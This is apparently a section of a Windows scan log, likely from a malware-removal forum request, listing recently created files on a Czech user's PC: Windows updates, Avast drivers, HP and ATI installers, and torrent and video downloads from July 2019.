2019-07-30 09:40 - 2019-07-30 09:40 - 000013070 _____ C:\Users\Radim\Downloads\[CzT]Halloween_2018_CZ_.torrent
2019-07-30 00:43 - 2019-07-30 00:43 - 000000439 _____ C:\WINDOWS\system32\Drivers\etc\hosts.ics
2019-07-30 00:41 - 2011-09-12 18:05 - 000003917 _____ C:\WINDOWS\SysWOW64\atipblup.dat
2019-07-30 00:38 - 2019-07-30 00:39 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2019-07-30 00:37 - 2019-07-30 00:37 - 001953056 _____ (HP Inc.) C:\Users\Radim\Downloads\HPBRCULauncher.exe
2019-07-30 00:36 - 2019-07-30 00:36 - 000002386 _____ C:\Users\Public\Desktop\HP Wireless HotSpot.lnk
2019-07-30 00:35 - 2019-07-30 00:35 - 000000000 ____D C:\Users\Radim\AppData\Local\Downloaded Installations
2019-07-30 00:34 - 2019-07-30 00:34 - 000000000 ____D C:\Program Files\ATI Technologies
2019-07-30 00:34 - 2019-07-30 00:34 - 000000000 ____D C:\Program Files\ATI
2019-07-30 00:31 - 2019-07-30 00:31 - 006205512 _____ (Hewlett-Packard Company ) C:\Users\Radim\Downloads\sp64136.exe
2019-07-30 00:27 - 2019-07-30 00:29 - 299453032 _____ (InstallShield Software Corporation ) C:\Users\Radim\Downloads\sp69094.exe
2019-07-29 23:44 - 2019-07-31 10:13 - 000003870 _____ C:\WINDOWS\System32\Tasks\CCleaner Update
2019-07-29 23:42 - 2019-07-29 23:42 - 020891464 _____ (Piriform Software Ltd) C:\Users\Radim\Downloads\ccsetup560.exe
2019-07-29 23:36 - 2019-07-29 23:36 - 000001023 _____ C:\Users\Radim\Desktop\SpeedFan.lnk
2019-07-29 23:36 - 2019-07-29 23:36 - 000000045 _____ C:\WINDOWS\SysWOW64\initdebug.nfo
2019-07-29 23:36 - 2019-07-29 23:36 - 000000000 ____D C:\Users\Radim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan
2019-07-29 23:36 - 2019-07-29 23:36 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2019-07-29 23:35 - 2019-07-29 23:35 - 003086696 _____ C:\Users\Radim\Downloads\instspeedfan452(1).exe
2019-07-29 21:48 - 2019-07-29 21:48 - 000000451 _____ C:\WINDOWS\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
2019-07-29 21:42 - 2019-05-30 21:55 - 000835688 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2019-07-29 21:42 - 2019-05-30 21:55 - 000179816 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2019-07-29 21:25 - 2019-07-31 10:13 - 000002990 _____ C:\WINDOWS\System32\Tasks\Synaptics TouchPad Enhancements
2019-07-29 21:06 - 2019-07-29 21:06 - 000000000 ____D C:\Program Files (x86)\HP
2019-07-29 21:05 - 2019-07-10 06:08 - 025754624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-07-29 21:05 - 2019-07-10 05:46 - 002909184 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-07-29 21:05 - 2019-07-10 05:44 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2019-07-29 21:05 - 2019-07-10 05:34 - 005775872 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2019-07-29 21:05 - 2019-07-10 05:33 - 000790528 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2019-07-29 21:05 - 2019-07-10 05:32 - 020291072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2019-07-29 21:05 - 2019-07-10 05:14 - 000496128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2019-07-29 21:05 - 2019-07-10 05:12 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2019-07-29 21:05 - 2019-07-10 05:11 - 002301952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-07-29 21:05 - 2019-07-10 05:11 - 000092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2019-07-29 21:05 - 2019-07-10 05:09 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2019-07-29 21:05 - 2019-07-10 05:09 - 000145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2019-07-29 21:05 - 2019-07-10 05:04 - 001033216 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2019-07-29 21:05 - 2019-07-10 05:04 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2019-07-29 21:05 - 2019-07-10 04:58 - 000262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2019-07-29 21:05 - 2019-07-10 04:56 - 000809472 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2019-07-29 21:05 - 2019-07-10 04:56 - 000728064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2019-07-29 21:05 - 2019-07-10 04:56 - 000381952 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2019-07-29 21:05 - 2019-07-10 04:53 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2019-07-29 21:05 - 2019-07-10 04:51 - 015389696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2019-07-29 21:05 - 2019-07-10 04:48 - 000168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
2019-07-29 21:05 - 2019-07-10 04:48 - 000076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2019-07-29 21:05 - 2019-07-10 04:47 - 000128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2019-07-29 21:05 - 2019-07-10 04:46 - 000279040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2019-07-29 21:05 - 2019-07-10 04:44 - 000880640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2019-07-29 21:05 - 2019-07-10 04:43 - 004858880 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2019-07-29 21:05 - 2019-07-10 04:42 - 004494848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2019-07-29 21:05 - 2019-07-10 04:40 - 000230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2019-07-29 21:05 - 2019-07-10 04:38 - 002058752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2019-07-29 21:05 - 2019-07-10 04:38 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2019-07-29 21:05 - 2019-07-10 04:38 - 000333312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2019-07-29 21:05 - 2019-07-10 04:34 - 013791232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2019-07-29 21:05 - 2019-07-10 04:31 - 001566208 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2019-07-29 21:05 - 2019-07-10 04:19 - 004386304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2019-07-29 21:05 - 2019-07-10 04:19 - 000800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2019-07-29 21:05 - 2019-07-10 04:16 - 001331200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2019-07-29 21:05 - 2019-07-10 04:15 - 000710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2019-07-29 21:05 - 2019-06-25 05:54 - 001368080 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2019-07-29 21:05 - 2019-06-25 04:59 - 004169728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2019-07-29 21:05 - 2019-06-25 04:36 - 000128512 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe
2019-07-29 21:05 - 2019-06-25 04:07 - 001994240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2019-07-29 21:05 - 2019-06-25 03:48 - 001756160 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2019-07-29 21:05 - 2019-06-25 03:44 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityService.dll
2019-07-29 21:05 - 2019-06-25 03:42 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll
2019-07-29 21:05 - 2019-06-25 03:41 - 001085440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2019-07-29 21:05 - 2019-06-25 03:41 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2019-07-29 21:05 - 2019-06-25 03:39 - 001559552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2019-07-29 21:05 - 2019-06-25 03:36 - 001549824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2019-07-29 21:05 - 2019-06-25 03:31 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2019-07-29 21:05 - 2019-06-25 03:28 - 000827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2019-07-29 21:05 - 2019-06-25 03:26 - 000238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2019-07-29 21:05 - 2019-06-18 05:13 - 000166912 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2019-07-29 21:05 - 2019-06-18 05:06 - 000269312 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2019-07-29 21:05 - 2019-06-18 04:55 - 000214528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2019-07-29 21:05 - 2019-06-18 04:42 - 001349120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2019-07-29 21:05 - 2019-06-18 04:33 - 000956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2019-07-29 21:05 - 2019-06-15 17:22 - 000910848 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2019-07-29 21:05 - 2019-06-12 02:51 - 000169256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2019-07-29 21:05 - 2019-06-11 15:37 - 000293888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Dism.exe
2019-07-29 21:05 - 2019-06-11 15:35 - 000215040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Dism.exe
2019-07-29 21:05 - 2019-06-10 23:42 - 001712640 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000801792 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000732160 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000634368 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000501760 _____ (Microsoft Corporation) C:\WINDOWS\system32\centel.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2019-07-29 21:05 - 2019-06-08 18:09 - 000445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2019-07-29 21:05 - 2019-06-08 17:55 - 001101824 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdvidcrl.dll
2019-07-29 21:05 - 2019-06-08 17:43 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2019-07-29 21:05 - 2019-06-08 17:33 - 000856064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvidcrl.dll
2019-07-29 21:05 - 2019-06-08 16:55 - 007035392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2019-07-29 21:05 - 2019-06-08 16:53 - 006217216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2019-07-29 21:05 - 2019-06-07 00:49 - 007362800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-07-29 21:05 - 2019-06-06 19:14 - 000809472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2019-07-29 21:05 - 2019-06-02 17:42 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpclip.exe
2019-07-29 21:05 - 2019-05-31 18:55 - 001265152 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2019-07-29 21:05 - 2019-05-31 18:54 - 000504832 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskcomp.dll
2019-07-29 21:05 - 2019-05-31 18:53 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskcomp.dll
2019-07-29 21:05 - 2019-05-25 04:36 - 022373096 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2019-07-29 21:05 - 2019-05-25 04:32 - 002013432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2019-07-29 21:05 - 2019-05-25 04:30 - 000500464 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2019-07-29 21:05 - 2019-05-25 04:30 - 000394568 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2019-07-29 21:05 - 2019-05-25 04:30 - 000272184 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2019-07-29 21:05 - 2019-05-25 03:59 - 019790160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2019-07-29 21:05 - 2019-05-25 03:56 - 000370872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2019-07-29 21:05 - 2019-05-25 03:56 - 000344984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
2019-07-29 21:05 - 2019-05-25 02:31 - 000963072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2019-07-29 21:05 - 2019-05-25 02:19 - 000551152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2019-07-29 21:05 - 2019-05-25 02:17 - 000230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2019-07-29 21:05 - 2019-05-22 20:20 - 000120312 _____ (Microsoft Corporation) C:\WINDOWS\system32\userenv.dll
2019-07-29 21:05 - 2019-05-22 19:50 - 000098320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\userenv.dll
2019-07-29 21:05 - 2019-05-21 02:50 - 001383424 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2019-07-29 21:05 - 2019-05-17 06:47 - 000060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2019-07-29 21:05 - 2019-05-17 06:07 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2019-07-29 21:05 - 2019-05-16 20:23 - 000444144 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2019-07-29 21:05 - 2019-05-16 20:22 - 000334280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2019-07-29 21:05 - 2019-05-15 22:33 - 000333552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2019-07-29 21:05 - 2019-05-15 02:53 - 000136800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2019-07-29 21:05 - 2019-05-14 22:23 - 000377800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2019-07-29 21:05 - 2019-05-14 16:18 - 003718144 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2019-07-29 21:05 - 2019-05-11 17:50 - 001441792 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2019-07-29 21:05 - 2019-05-11 17:46 - 000840704 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2019-07-29 21:05 - 2019-05-11 17:34 - 000697344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2019-07-29 21:05 - 2019-05-10 15:20 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2019-07-29 21:05 - 2019-05-10 15:20 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2019-07-29 21:05 - 2019-05-10 15:20 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2019-07-29 21:05 - 2019-05-10 15:20 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2019-07-29 21:05 - 2019-05-09 09:41 - 003325440 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2019-07-29 21:05 - 2019-05-09 08:40 - 002779648 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2019-07-29 21:05 - 2019-05-09 08:30 - 003619328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2019-07-29 21:05 - 2019-05-09 07:47 - 002464256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2019-07-29 21:05 - 2019-05-06 05:47 - 001311768 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2019-07-29 21:05 - 2019-05-06 05:36 - 001677024 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2019-07-29 21:05 - 2019-05-06 05:36 - 001537776 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2019-07-29 21:05 - 2019-05-06 05:34 - 000805384 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2019-07-29 21:05 - 2019-05-06 05:33 - 001136208 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2019-07-29 21:05 - 2019-05-06 04:12 - 000861184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2019-07-29 21:05 - 2019-05-06 04:08 - 001040384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2019-07-29 21:05 - 2019-05-06 03:41 - 001197056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2019-07-29 21:05 - 2019-04-25 00:38 - 002452208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2019-07-29 21:05 - 2019-04-14 18:37 - 000096768 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2019-07-29 21:05 - 2019-04-14 18:35 - 000148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2019-07-29 21:05 - 2019-04-14 18:09 - 000078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2019-07-29 21:05 - 2019-04-14 18:07 - 000113664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2019-07-29 21:05 - 2019-04-12 15:20 - 000994384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2019-07-29 21:05 - 2019-04-12 15:20 - 000914584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2019-07-29 21:05 - 2019-04-12 15:20 - 000064248 _____ (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-crt-private-l1-1-0.dll
2019-07-29 21:05 - 2019-04-09 00:17 - 000537096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2019-07-29 21:05 - 2019-04-09 00:17 - 000139912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2019-07-29 21:05 - 2019-04-09 00:13 - 000449744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2019-07-29 21:05 - 2019-04-09 00:12 - 000136736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2019-07-29 21:05 - 2019-04-08 23:40 - 000136432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wfplwfs.sys
2019-07-29 21:05 - 2019-04-07 02:57 - 001214720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2019-07-29 21:05 - 2019-04-06 22:31 - 000376320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll
2019-07-29 21:05 - 2019-04-06 20:39 - 002172832 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2019-07-29 21:05 - 2019-04-06 20:39 - 001662512 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2019-07-29 21:05 - 2019-04-06 00:47 - 000096208 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptdll.dll
2019-07-29 21:05 - 2019-04-06 00:46 - 000177608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2019-07-29 21:05 - 2019-04-06 00:44 - 000073248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptdll.dll
2019-07-29 21:05 - 2019-04-05 16:06 - 001253888 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2019-07-29 21:05 - 2019-04-05 16:06 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2019-07-29 21:05 - 2019-04-05 16:06 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2019-07-29 21:05 - 2019-04-05 16:01 - 000160256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2019-07-29 21:05 - 2019-04-05 01:58 - 000863232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2019-07-29 21:05 - 2019-04-05 00:15 - 000513416 _____ C:\WINDOWS\SysWOW64\locale.nls
2019-07-29 21:05 - 2019-04-05 00:15 - 000513416 _____ C:\WINDOWS\system32\locale.nls
2019-07-29 21:05 - 2019-04-04 20:01 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2019-07-29 21:05 - 2019-04-04 19:10 - 001080320 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL
2019-07-29 21:05 - 2019-04-04 18:48 - 000713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2019-07-29 21:05 - 2019-04-04 18:15 - 000562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll
2019-07-29 20:58 - 2019-06-25 04:59 - 000146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2019-07-29 20:58 - 2019-06-25 04:24 - 000129536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2019-07-29 01:17 - 2019-07-29 01:29 - 000000000 ____D C:\Users\Radim\Downloads\Simpsonovi 28. sĂ©rie
2019-07-27 13:23 - 2019-07-29 23:50 - 000000000 ____D C:\Users\Radim\AppData\Local\CrashDumps
2019-07-25 15:39 - 2019-07-25 15:39 - 000387896 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswVmm.sys
2019-07-24 11:41 - 2019-07-24 11:41 - 000002101 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2019-07-24 11:41 - 2019-07-24 11:41 - 000000000 ____D C:\Users\Radim\AppData\Roaming\AVAST Software
2019-07-24 11:41 - 2019-07-24 11:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2019-07-24 11:39 - 2019-07-31 10:12 - 000000000 ____D C:\WINDOWS\System32\Tasks\Avast Software
2019-07-24 11:39 - 2019-07-24 11:39 - 000003910 _____ C:\WINDOWS\System32\Tasks\Avast Emergency Update
2019-07-24 11:38 - 2019-07-24 11:38 - 001030992 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSnx.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000477288 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSP.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000363400 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe
2019-07-24 11:38 - 2019-07-24 11:38 - 000279336 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswHdsKe.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000263224 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbidsdriver.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000225816 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswStm.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000209256 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswArPot.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000206056 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbidsh.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000169112 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswMonFlt.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000112520 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRdr2.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000088160 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRvrt.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000061688 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbuniv.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000042504 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswKbd.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000037320 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswArDisk.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000000000 ____D C:\Program Files\Common Files\AVAST Software
2019-07-24 11:37 - 2019-07-24 11:37 - 000000000 ____D C:\Program Files\AVAST Software
2019-07-24 11:36 - 2019-07-24 11:38 - 000000000 ____D C:\ProgramData\AVAST Software
2019-07-24 11:36 - 2019-07-24 11:36 - 000228544 _____ (AVAST Software) C:\Users\Radim\Downloads\avast_free_antivirus_setup_online.exe
2019-07-24 11:00 - 2019-07-31 10:42 - 000000986 _____ C:\Users\Public\Desktop\Firefox.lnk
2019-07-24 11:00 - 2019-07-24 11:00 - 000000000 ____D C:\Users\Radim\Desktop\PĹŻvodnĂ data aplikace Firefox
2019-07-24 11:00 - 2019-07-24 11:00 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-07-24 11:00 - 2019-07-24 11:00 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-07-24 10:58 - 2019-07-24 10:59 - 000285552 _____ (Mozilla) C:\Users\Radim\Downloads\Firefox Installer.exe
2019-07-24 10:54 - 2019-07-24 10:54 - 002388176 _____ (Microsoft Corporation) C:\Users\Radim\Downloads\d3dx9_30.dll
2019-07-23 11:36 - 2019-07-23 15:50 - 1598653180 ____R C:\Users\Radim\Downloads\NFS Underground 2 HD TEXTURY +ENB-MOD+ NOVE AUTA.rar
2019-07-19 13:29 - 2019-07-19 13:29 - 001151544 _____ (Google LLC) C:\Users\Radim\Downloads\ChromeSetup.exe
2019-07-15 11:51 - 2019-07-15 11:51 - 000000270 __RSH C:\ProgramData\ntuser.pol
2019-07-15 09:49 - 2019-07-15 09:50 - 000000000 ____D C:\Users\Radim\Desktop\bryna mrdky
2019-07-15 09:45 - 2019-07-15 09:45 - 003462156 _____ C:\Users\Radim\Downloads\WDFirmwareUpdater.zip
2019-07-14 21:14 - 2019-07-14 21:14 - 000000000 _____ C:\Users\Radim\Desktop\NovĂ˝ textovĂ˝ dokument (2).txt
2019-07-10 17:01 - 2019-07-10 17:01 - 000021076 _____ C:\Users\Radim\Downloads\[CzT]Serif_a_mimozemstan_1_2_Uno_sceriffo_extra_terrestre_Chissa_perche_capitano_1979_1981_.torrent
2019-07-10 16:13 - 2019-07-10 16:13 - 000016610 _____ C:\Users\Radim\Downloads\[CzT]Tang_lang_Shaolin_Mantis_1978_CZ_.torrent
2019-07-09 10:05 - 2019-07-09 10:32 - 000000000 ____D C:\Users\Radim\Downloads\KrvavĂ˝ sport 1,2,3
2019-07-09 09:45 - 2019-07-09 09:46 - 000001253 _____ C:\Users\Radim\Desktop\Wow.lnk
2019-07-08 17:44 - 2019-07-08 17:52 - 1976872960 ____R C:\Users\Radim\Downloads\Independence.Day.Resurgence.2016.BRRip.XviD.CZ-TreZzoR.avi
2019-07-08 17:43 - 2019-07-08 17:43 - 000014496 _____ C:\Users\Radim\Downloads\[CzT]Krvavy_sport_Bloodsport_1_2_3_1988_1996_.torrent
2019-07-08 17:39 - 2019-07-08 17:39 - 000019446 _____ C:\Users\Radim\Downloads\[CzT]Den_nezavislosti_Novy_utok_Independence_Day_Resurgence_2016_CZ_.torrent
2019-07-01 10:11 - 2019-07-18 10:26 - 000000000 ____D C:\Users\Radim\AppData\Roaming\Discord
2019-07-01 10:11 - 2019-07-01 10:11 - 000002211 _____ C:\Users\Radim\Desktop\Discord.lnk
